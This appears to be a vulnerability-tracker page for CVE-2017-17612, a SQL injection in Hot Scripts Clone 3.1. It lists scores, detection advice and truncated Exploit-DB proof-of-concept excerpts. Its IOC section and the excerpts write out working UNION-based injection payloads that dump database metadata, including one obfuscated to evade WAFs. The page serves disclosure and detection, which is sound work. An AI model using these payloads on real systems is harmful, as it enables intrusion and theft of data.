CVE-2017-17612
published 2017-12-13CVE-2017-17612: Hot Scripts Clone 3.1 has SQL Injection via the /categories subctid or mctid parameter.
PriorityP260critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.66%
88.2th percentile
Hot Scripts Clone 3.1 has SQL Injection via the /categories subctid or mctid parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hot_scripts_clone_project | hot_scripts_clone | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://server/categories?subctid=-yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-↗
urlhttp://server/categories?&mctid=-Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-↗
command-Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-↗
command-Y12h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-↗
- →Monitor HTTP requests to the /categories endpoint for SQL injection patterns in the 'subctid' parameter, specifically looking for UNION-based payloads with quote characters and comment sequences (--+-). ↗
- →Monitor HTTP requests to the /categories endpoint for SQL injection patterns in the 'mctid' parameter, including UNION ALL SELECT payloads targeting INFORMATION_SCHEMA.TABLES. ↗
- →Detect MySQL inline comment obfuscation technique using /*!08888UNION*/, /*!08888ALL*/, /*!08888SELECT*/ versioned comment syntax used to bypass WAF/filters in the mctid and subctid parameters. ↗
- →Detect combined injection attempts where both subctid and mctid parameters are supplied simultaneously with SQL payloads. ↗
- ·Exploit PoC uses [PATH] as a placeholder for the application's installation subdirectory; the /categories endpoint may be at a non-root path depending on deployment. ↗
- ·CVE was assigned N/A in the original exploit submissions; the CVE-2017-17612 assignment came later via NVD and covers version 3.1, while exploit EDB-43916 targets version 1.0 of the same product. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Hot Scripts Clone - 'subctid' SQL Injection
exploitdb·2018-01-28
CVE-2017-17612 Hot Scripts Clone - 'subctid' SQL Injection
Hot Scripts Clone - 'subctid' SQL Injection
---
# # # # #
# Exploit Title: Hot Scripts Clone Script 1.0 - SQL Injection
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/M72g4502563/php-scripts/hot-scripts-clone-:-script-classified
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/categories?keyword=&mctid=[SQL]&subctid=[SQL]
#
# -Y12h7890'++/*!08888UNION*/+/*!08888ALL*/+/*!08888SELECT*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888
Exploit-DB
Hot Scripts Clone 3.1 - 'subctid' / 'mctid' SQL Injection
exploitdb·2017-12-11
CVE-2017-17612 Hot Scripts Clone 3.1 - 'subctid' / 'mctid' SQL Injection
Hot Scripts Clone 3.1 - 'subctid' / 'mctid' SQL Injection
---
# # # # #
# Exploit Title: Hot Scripts Clone 3.1 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/hot-scripts-clone-script-classified/
# Version: 3.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/categories?subctid=[SQL]
#
# -yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
#
# http://server/categories?subctid=-yzEb7895'++UNION+A
No writeups or analysis indexed.
https://packetstormsecurity.com/files/145324/Hot-Scripts-Clone-3.1-SQL-Injection.htmlhttps://www.exploit-db.com/exploits/43284/https://www.exploit-db.com/exploits/43916/https://packetstormsecurity.com/files/145324/Hot-Scripts-Clone-3.1-SQL-Injection.htmlhttps://www.exploit-db.com/exploits/43284/https://www.exploit-db.com/exploits/43916/
2017-12-13
Published